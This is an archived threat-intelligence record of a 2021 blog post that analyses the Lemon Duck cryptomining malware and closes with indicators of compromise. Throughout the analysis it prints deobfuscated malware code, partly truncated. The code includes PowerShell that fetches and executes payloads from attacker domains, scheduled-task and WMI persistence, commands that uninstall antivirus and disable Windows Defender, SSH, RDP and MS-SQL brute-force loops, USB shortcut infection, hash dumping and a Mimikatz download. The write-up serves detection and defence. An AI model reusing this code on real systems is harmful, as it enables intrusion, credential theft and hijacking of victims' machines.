{
	"id": "47dc7f72-c375-4be9-8163-ce932ff656ab",
	"created_at": "2026-04-06T00:12:47.581031Z",
	"updated_at": "2026-04-10T03:21:01.378882Z",
	"deleted_at": null,
	"sha1_hash": "cffbc669832310936a59f0efb5ef74f4cfc16a5e",
	"title": "Lemon-Duck Cryptominer Technical Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126807,
	"plain_text": "Lemon-Duck Cryptominer Technical Analysis\r\nBy Anonymous\r\nPublished: 2021-06-01 · Archived: 2026-04-05 13:39:20 UTC\r\nThis blog post was authored by Fareed.\r\nSummary\r\nLemon Duck is crypto-mining malware that uses the resources of infected computers to mine Monero cryptocurrency. This malware has many capabilities and runs its payload mostly in memory, which keeps its presence on infected machines stealthy. The fileless infection mainly uses PowerShell modules. Phishing emails with a malicious document, the SMB Remote Code Execution Vulnerability (CVE-2017-0144), and brute-force attacks were used to spread through the internal network, while a malicious document was used to infect external victims. The operators also leverage open-source tools such as XMRig, PingCastle, and PowerSploit to achieve their goals.\r\nInitial access\r\nThe infection of this crypto miner begins on the victim in many ways:\r\nPhishing email with a malicious document as an attachment\r\nSMB exploit\r\nRDP brute-force\r\nUSB infection\r\nSSH brute-force\r\nPass the hash\r\nMS-SQL brute-force\r\nRedis remote command\r\nYarn remote command\r\nOur Splunk detection team first detected a lot of suspicious communication to the domain name t[.]bb3u9[.]com, as shown below:\r\nhttp://t.bb3u9.com/report.jsp?\u0026redacted\u0026redacted\u0026redacted\u00267%20Professional%20_6.1.7600\u00261\u0026redacted$redacted\u0026H_R\u0026\r\nOur threat analyst team investigated the URL and realized that a lot of computer information is appended to it, including the Windows version, hostname, and more; in our case, this is the infected victim's information.\r\nUsing VTGraph from VirusTotal, the domain was flagged as malicious by various security vendors. 
The domain has also communicated with a lot of malicious files, which confirmed that the domain is malicious.\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 1 of 15\n\nFigure 1: VTGraph result of domain t[.]bb3u9[.]com\r\nTracking and hunting down the domain and a few indicators of initial access in Splunk, we found that the malware was spread through the pass-the-hash method.\r\nWhich execution made the above request?\r\nAfter conducting a malware analysis on the sample, we observed that the above-mentioned request was made after the execution of the persistence-mechanism PowerShell script launched from a scheduled task. The figure below shows the scheduled task created by the malware.\r\nFigure 2: Lemon Duck's scheduled task in our Windows VM analysis\r\nThe formatted version of the PowerShell code is as below:\r\nfunction a($u){\r\n $d=(Ne`w-Obj`ect Net.WebC`lient).DownloadData($u);\r\n $c=$d.count;\r\n if($c -gt 173){\r\n $b=$d[173..$c];\r\n $p=New-Object Security.Cryptography.RSAParameters;\r\n $p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K\r\n $p.Exponent=0x01,0x00,0x01;\r\n $r=New-Object Security.Cryptography.RSACryptoServiceProvider;\r\n $r.ImportParameters($p);\r\n if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64St\r\n I`ex(-join[char[]]$b)\r\n }}}\r\n$url='http://'+'t.bb3'+'u9.com';\r\na($url+'/a.jsp?rep_20210521?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUI\r\nThe final line of the code retrieves the content of a.jsp and invokes it.\r\nFirst stager\r\nOne question that came to mind is how the scheduled task was created.\r\nOur analyst then tracked the malware behavior based on the sample analysis and found out that 
the first-stager PowerShell script of the malware creates the scheduled task.\r\nThe following decoded snippet of the PowerShell code shows that the full scheduled-task payload line is stored in the variable $tmps.\r\n$tmps='function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).\"DownloadData\"($u);$c=$d.count;if($c -gt 173){$b=$d[173\r\n\u003c--snippet--\u003e\r\nif($sa){\r\nschtasks /create /ru system /sc MINUTE /mo 60 /tn \"$tnf\\$tn\" /F /tr \"powershell -w hidden -c PS_CMD\"\r\n} else {\r\nschtasks /create /sc MINUTE /mo 60 /tn \"$tnf\\$tn\" /F /tr \"powershell -w hidden -c PS_CMD\"\r\n}\r\n\u003c--snippet--\u003e\r\ntry{\r\nif($action.Arguments.Contains(\"PS_CMD\")){\r\n$folder.RegisterTask($task.Name, $task.Xml.replace(\"PS_CMD\",$tmps.replace('U1',$u.substring(0,5)).replace('U2',$\r\n}\r\nThe stager also drops a WMI persistence mechanism.\r\nSet-WmiInstance -Class __EventFilter -NameSpace \"root\\subscription\" -Arguments @{Name=\"blackball1\";EventNameSpa\r\nforeach($u in $us){\r\n$theName=getRan\r\n$wmicmd=$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5)).replace('a.jsp','aa.jsp')\r\nSet-WmiInstance -Class __FilterToConsumerBinding -Namespace \"root\\subscription\" -Arguments @{Filter=(Set-WmiInst\r\nOther things to highlight in the first stager are a few interesting functions, for example uninstalling AV, verifying whether the current hostname has already been infected, and denying access on ports 445 and 135.\r\nThe snippet below shows the malware using the WMIC utility to uninstall antivirus products, including Eset, Avast, and many more.\r\ncmd.exe /c start /b wmic.exe product where \"name like '%Eset%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%%Kaspersky%%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%avast%'\" call 
uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%avp%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%Security%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%AntiVirus%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%Norton Security%'\" call uninstall /nointeractive\r\ncmd.exe /c \"C:\\Progra~1\\Malwarebytes\\Anti-Malware\\unins000.exe\" /verysilent /suppressmsgboxes /norestart\r\ncmd.exe /c rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference\r\ncmd.exe /c rem To also disable Windows Defender Security Center include this\r\ncmd.exe /c rem cmd.exe /c reg add \"HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\" /v \"Start\" /t R\r\ncmd.exe /c rem 1 - Disable Real-time protection\r\ncmd.exe /c reg delete \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /f\r\ncmd.exe /c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"\r\ncmd.exe /c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\"\r\ncmd.exe /c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d\r\nThe PowerShell code then prepares the network environment, for example by denying access on ports 445 and 135 so that other malware can exploit SMB with the EternalBlue exploit.\r\ncmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd\r\nnetsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53\r\nnetsh advfirewall firewall add rule name=\"deny445\" dir=in protocol=tcp localport=445 action=block\r\nnetsh advfirewall firewall add rule name=\"deny135\" dir=in protocol=tcp localport=135 action=block\r\nSo, after the first stager is executed, it will set up the environment for 
the malware, such as removing AV, denying access on the SMB port, and dropping the persistence mechanism. Once the persistent PowerShell payload is executed, the malware retrieves and invokes the PowerShell command in the JSP file a.jsp.\r\nDeobfuscating a.jsp\r\nThe content of a.jsp was again multi-encoded by the malware author.\r\nI`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$(\r\n\u003c--snippet--\u003e\r\n6f5334f6bbfdfebfe4ce271fa5bfdb56dafc64fa71f5ac21564f3fbef3d1cf8cd3adad0bfae85b8ba7f5b73ebe337e71bc38fdde3d20b7f7\r\nUsing PowerShell ISE, we then decoded the encoded code above to analyze the clean version of the payload, just as we did with the first stager. The deobfuscation progress is shown in figures 3 to 6:\r\nFigure 3: First version of decoded payload\r\nFigure 4: Second version of decoded payload\r\nFigure 5: Third version of decoded payload\r\nFigure 6: Final and clean version of decoded payload\r\nAfter deobfuscation, the script becomes readable. 
We will highlight only the important parts of the payload.\r\nIt collects information about the infected environment and stores each value in a variable.\r\n$down_url = \"http://d.u78wjdu.com\"\r\nif(!$url){$url=\"http://t.bb3u9.com\"}\r\n$core_url = $url.split(\"/\")[0..2]-join\"/\"\r\n$permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Se\r\n$comp_name = $env:COMPUTERNAME\r\n$guid = (get-wmiobject Win32_ComputerSystemProduct).UUID\r\n$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-ob\r\n$osb = (Get-WmiObject -class Win32_OperatingSystem)\r\n$os = $osb.Caption.replace(\"Microsoft Windows \",\"\")+\"_\"+$osb.Version\r\n$user = $env:USERNAME\r\n$domain = (Get-WmiObject win32_computersystem).Domain\r\n$uptime = [timespan]::FromMilliseconds([environment]::TickCount)|foreach{$_.totalseconds}\r\n$card = (Get-WmiObject Win32_VideoController).name\r\n$cpu_per = \"$((Get-WmiObject -Class Win32_Processor).LoadPercentage)\"\r\ngwmi Win32_PhysicalMemory | %{$msum = 0} { $msum += $_.Capacity };$mem=$msum/1Gb\r\nThe malware downloads and runs various payloads called m6.bin, m6g.bin, kr.bin, if.bin, and nvd.zip onto the disk.\r\nfunction stp($gra){\r\n write-host $gra\r\nStart-Process -FilePath cmd.exe -ArgumentList \"/c $gra\"\r\n}\r\nfunction gcf($code,$md,$fn){\r\n('echo '+$code+';$ifmd5='''+$md+''';$ifp=$env:tmp+''\\'+$fn+''';$down_url='''+$down_url+''';function gmd\r\n}\r\nfunction gpa($fnam,$name){\r\n('for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin\r\n}\r\nfunction gpb($name){\r\n 'I`EX(-join[char[]]$con)|'+$name+' -'\r\n}\r\nfunction gcode($fl) {\r\n'try{$local'+$fl+'=$flase;New-Object Threading.Mutex($true,''Global\\eLocal'+$fl+''',[ref]$local'+$fl+')\r\n}\r\n$code1=gcode \"If\"\r\nI`Ex 
$code1\r\nif($localIf){\r\nstp ((gcf $code1 $ifmd5 $ifbin)+(gpb $rename))\r\n}\r\nif($is64){\r\n$code2=gcode \"TMn\"\r\nI`Ex $code2\r\nif($localTMn){\r\nstp ((gcf $code2 $mmd5 $mbin)+(gpa $mbin $rename))\r\n}}\r\nif(($isn -or $isa) -and $is64){\r\n$code3=gcode \"TMng\"\r\nI`Ex $code3\r\nif($localTMng){\r\nstp ((gcf $code3 $mgmd5 $mgbin)+(gpa $mgbin $rename))\r\n}}\r\n$code4=gcode \"Kr\"\r\nI`Ex $code4\r\nif($localKr){\r\nstp ((gcf $code4 $krmd5 $krbin)+(gpb $rename))\r\n}\r\nFunction SIEX acts as the CnC communication function. When communicating with the attacker, the script sends a long URL containing all the information gathered about the environment, uniquely identifying the infected machine.\r\nfunction SIEX {\r\nParam(\r\n[string]$url\r\n)\r\ntry{\r\n$webclient = Ne`w-Obj`ect Net.WebC`lient\r\n$finalurl = \"$url\"+\"?\"+\"$params\"\r\ntry{\r\n$webclient.Headers.add(\"User-Agent\",\"Lemon-Duck-\"+$Lemon_Duck.replace('\\','-'))\r\n} catch{}\r\n$res_bytes = $webclient.DownloadData($finalurl)\r\nif($res_bytes.count -gt 173){\r\n$sign_bytes = $res_bytes[0..171];\r\n$raw_bytes = $res_bytes[173..$res_bytes.count];\r\n$rsaParams = New-Object System.Security.Cryptography.RSAParameters\r\n$rsaParams.Modulus = 0xda,0x65,0xa8,0xd7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82\r\n$rsaParams.Exponent = 0x01,0x00,0x01\r\n$rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider;\r\n$rsa.ImportParameters($rsaParams)\r\n$base64 = -join([char[]]$sign_bytes)\r\n$byteArray = [convert]::FromBase64String($base64)\r\n$sha1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider\r\nif($rsa.verifyData($raw_bytes,$sha1,$byteArray)) {\r\nIEX (-join[char[]]$raw_bytes)\r\n}}\r\n} catch{}}\r\nStart-Sleep -Seconds 3\r\nSIEX \"$core_url/report.jsp\"\r\nAll 
downloaded payloads are stored in the temp folder, as we can see in the figure below:\r\nFigure 7: payloads downloaded in temp folder\r\nAnalyzing if.bin\r\nif.bin has also been obfuscated by the author.\r\nFigure 8: Obfuscated script\r\nWe performed the deobfuscation process, after which the script is readable, as shown in the figure below:\r\nFigure 9: Deobfuscated script\r\nA few important capabilities of the malicious files are explained below.\r\nFirst, the code contains a PingCastle module that is used for port scanning to detect machines that respond on port 445. It then launches the SMB exploit against that scanned port. The code snippet is as below:\r\nnamespace PingCastle.Scanners\r\n{\r\npublic class m17sc\r\n{\r\nstatic public bool Scan(string computer)\r\n{\r\nTcpClient client = new TcpClient();\r\nclient.Connect(computer, 445);\r\ntry\r\n{\r\nNetworkStream stream = client.GetStream();\r\nbyte[] negotiatemessage = GetNegotiateMessage();\r\nstream.Write(negotiatemessage, 0, negotiatemessage.Length);\r\nstream.Flush();\r\nbyte[] response = ReadSmbResponse(stream);\r\nif (!(response[8] == 0x72 \u0026\u0026 response[9] == 00)){\r\nthrow new InvalidOperationException(\"invalid negotiate response\");}\r\nbyte[] sessionSetup = GetR(response);\r\n\u003c-- snippet --\u003e\r\nAn RDP brute-forcing module is included to provide the RDP brute-force capability.\r\nnamespace RDP\r\n{\r\n public class BRUTE\r\n {\r\nprivate int flag1=-1;\r\nprivate bool check_login;\r\nprivate Process process;\r\npublic void exit(){\r\nif(!process.HasExited){\r\nprocess.Kill();};\r\nprocess.Close();}\r\n public int check(string exePath, string ip, string user, string pass, bool checklogin){\r\ntry{\r\ncheck_login = checklogin;\r\nprocess = new System.Diagnostics.Process();\r\nprocess.StartInfo.FileName = 
exePath;\r\nif(checklogin){\r\nprocess.StartInfo.Arguments = \"/u:\"+user+\" /p:\"+pass+\" /cert-ignore\r\n} else {\r\nprocess.StartInfo.Arguments = \"/u:\"+user+\" /p:\"+pass+\" /cert-ignore\r\nprocess.StartInfo.UseShellExecute = false;\r\nprocess.StartInfo.CreateNoWindow = true;\r\nprocess.StartInfo.RedirectStandardOutput = true;\r\nprocess.Start();\r\nprocess.BeginOutputReadLine();\r\nprocess.OutputDataReceived += new DataReceivedEventHandler(processOutputData\r\n System.Threading.Timer timer = new System.Threading.Timer(autoQuite, null, 10000, 5000);\r\n\u003c-- snippet --\u003e\r\nAnother infection method is via network drives and removable drives. It creates a .lnk file on each detected drive and executes the payload through the shortcut.\r\npublic class USBLNK\r\n {\r\n public static List\u003cstring\u003e blacklist = new List\u003cstring\u003e();\r\npublic static string gb3;\r\npublic static string gb6;\r\npublic static string jsdata;\r\n const string home = \"UTFsync\";\r\n const string inf_data = \"\\\\inf_data\"\r\n\u003c-- snippet --\u003e\r\nstatic bool IsSupported(DriveInfo drive) { return drive.IsReady \u0026\u0026 drive.AvailableFreeSpace \u003e\r\nstatic bool CheckBlacklist(string name) { return name==home || name==\"System Volume Informatio\r\nstatic bool Infect(string drive)\r\n {\r\n if (blacklist.Contains(drive)) {return true;}\r\nCreateLnk(drive, \"blue3.bin\", gb3);\r\nCreateLnk(drive, \"blue6.bin\", gb6);\r\nCreateJs(drive, \"readme.js\", jsdata);\r\n try{\r\n File.Create(drive + home + inf_data);\r\n return true;};\r\nThe PowerDump module is used to dump hashes from the local system.\r\n#######################################powerdump written by David Kennedy######################################\r\n$antpassword = [Text.Encoding]::ASCII.GetBytes(\"NTPASSWORD0\");\r\n$almpassword = [Text.Encoding]::ASCII.GetBytes(\"LMPASSWORD0\");\r\n$empty_lm = 
[byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);\r\n$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);\r\n$odd_parity = @(\r\n 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,\r\n 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,\r\n 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,\r\n 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,\r\n 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,\r\n 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,\r\n 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,\r\n 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,\r\n \u003c-- snippet --\u003e\r\nThe script tries to get the mimi.dat file, which contains the Mimikatz payload.\r\n$mimipath = $env:tmp+'\\mimi.dat'\r\n$d_retry=3\r\nwhile(!(Test-Path $mimipath) -or (Get-Item $mimipath).length -ne 3563487){\r\nif($d_retry -eq 0){break}\r\nwrite-host \"try to get mimi...\"\r\ntry{(new-object System.Net.WebClient).DownloadFile($down_url+\"/mimi.dat?v=$VVERSION\u0026r=$d_retry\",$mimipa\r\n$d_retry--\r\nstart-sleep 3\r\n}\r\n\u003c-- snippet --\u003e\r\nAnother capability to highlight is the MS-SQL brute-forcing code. 
It attempts to brute force MS-SQL to gain access.\r\nwrite-host \"start mssql port open scanning...\"\r\n$ms_portopen = localscan -port 1433 -addresses $ipaddresses[$i..($i+$tcount-1)]\r\n$old_portopen = localscan -port 65529 -addresses $ms_portopen[1]\r\nforeach($currip in $ms_portopen[1]) {\r\nif (($old_portopen[1] -notcontains $currip) -and ($currip.length -gt 6)){\r\nwrite-host \"start mssql burping...$currip\"\r\nfor($n=0; $n -lt $allpass.count; $n++){\r\n$flag=$false\r\nwrite-host(\"Try pass: \"+$allpass[$n])\r\n$flag,$banner = (mssqlrun -ip $currip -pass $allpass[$n] -cmd $mscmd_code -cmd1 $mscm\r\nif($flag) {\r\ntry{(New-Object Net.WebClient).DownloadString($down_url+'/report.json?v='+$V\r\nbreak}\r\n \u003c-- snippet --\u003e\r\nThe same goes for the SSH brute force, as shown below:\r\nwrite-host \"start ssh port open scanning...\"\r\n$ssh_portopen = localscan -port 22 -addresses $ipaddresses[$i..($i+$tcount-1)]\r\n$old_portopen = localscan -port 65529 -addresses $ssh_portopen[1]\r\nforeach($currip in $ssh_portopen[1]) {\r\nif (($old_portopen[1] -notcontains $currip) -and ($currip.length -gt 6)){\r\nwrite-host \"start ssh burping...$currip\"\r\nforeach($password in $allpass){\r\nwrite-host \"Try pass:$password\"\r\n$flag1 = -1\r\n$flag1 = sshbrute $currip \"root\" $password $ssh_code\r\nif($flag1 -eq 1){\r\nwrite-host \"SUCC!!\"\r\ntry{(New-Object Net.WebClient).DownloadString($down_url+'/report.json?v='+$VVERSION+'\r\nbreak\r\n\u003c-- snippet --\u003e\r\nm6.bin\r\nm6.bin is the executable used for the crypto miner. From the executable run below, the version of XMRig is 6.3.0.\r\nFigure 10: XMRig\r\nConclusion\r\nThe malware is very stealthy, as it leverages fileless execution for most of its payloads. 
The malware tends to infect and spread to as many systems as possible, as it implements multiple methods such as brute force and exploits. Observing these malware trends shows that the malware author often changes the CnC infrastructure IP address and improves the malware's capabilities, thus making more systems their victims.\r\nIndicators of Compromise\r\nHashes\r\nif.bin 8c4fba3df81475d075c535deae2cd373\r\nkr.bin c95f97fccb0bd80fa524cf2bfb0390a8\r\nm6.exe 4094140d07826334c345f8dc392d8fe3\r\nmimi.dat a66953b8a3eeee7d5057ddf80b8be962\r\nDNS request\r\nt.bb3u9.com\r\nt.pp6r1.com\r\np.b69kq.com\r\nd.u78wjdu.com\r\nIP connections\r\n138.68.251.24\r\n138.68.186.90\r\n88.214.207.96\r\n45.63.34.251\r\n138.68.183.180\r\n176.58.99.231\r\nExtra (Deobfuscation)\r\nShout out to our internship students who managed to deobfuscate the obfuscated PowerShell. Below are the links to their write-ups:\r\n1. (shauqi): https://nightfury99.github.io/Malware-Deobfuscate/\r\n2. (Iqbal): https://mhdiqb-malware-analysis.blogspot.com/2021/06/exploits-analysis-jsp-code-was-and-code.html\r\n3. (malik): https://almalikzakwan.github.io/Lemon-DuckAnalysis/\r\n4. (Rosa): https://bobalattew.github.io/How-to-deobfuscate-malware-using-Powershell/\r\n5. (Taqi): https://github.com/tx-qi/mail.jsp-writeup\r\n6. (Izzat): https://github.com/Izzathajar/malware-diobfuscated/tree/gh-pages\r\n7. (Aina): https://hello-world9.github.io/fileless-attack-analysis/\r\n8. 
(Nadzirah): https://nadzirahmdisa.blogspot.com/2021/06/in-memory-attack-writeup.html\r\nSource: https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html"
	],
	"report_names": [
		"lemon-duck-cryptominer-technical.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434367,
	"ts_updated_at": 1775791261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cffbc669832310936a59f0efb5ef74f4cfc16a5e.pdf",
		"text": "https://archive.orkl.eu/cffbc669832310936a59f0efb5ef74f4cfc16a5e.txt",
		"img": "https://archive.orkl.eu/cffbc669832310936a59f0efb5ef74f4cfc16a5e.jpg"
	}
}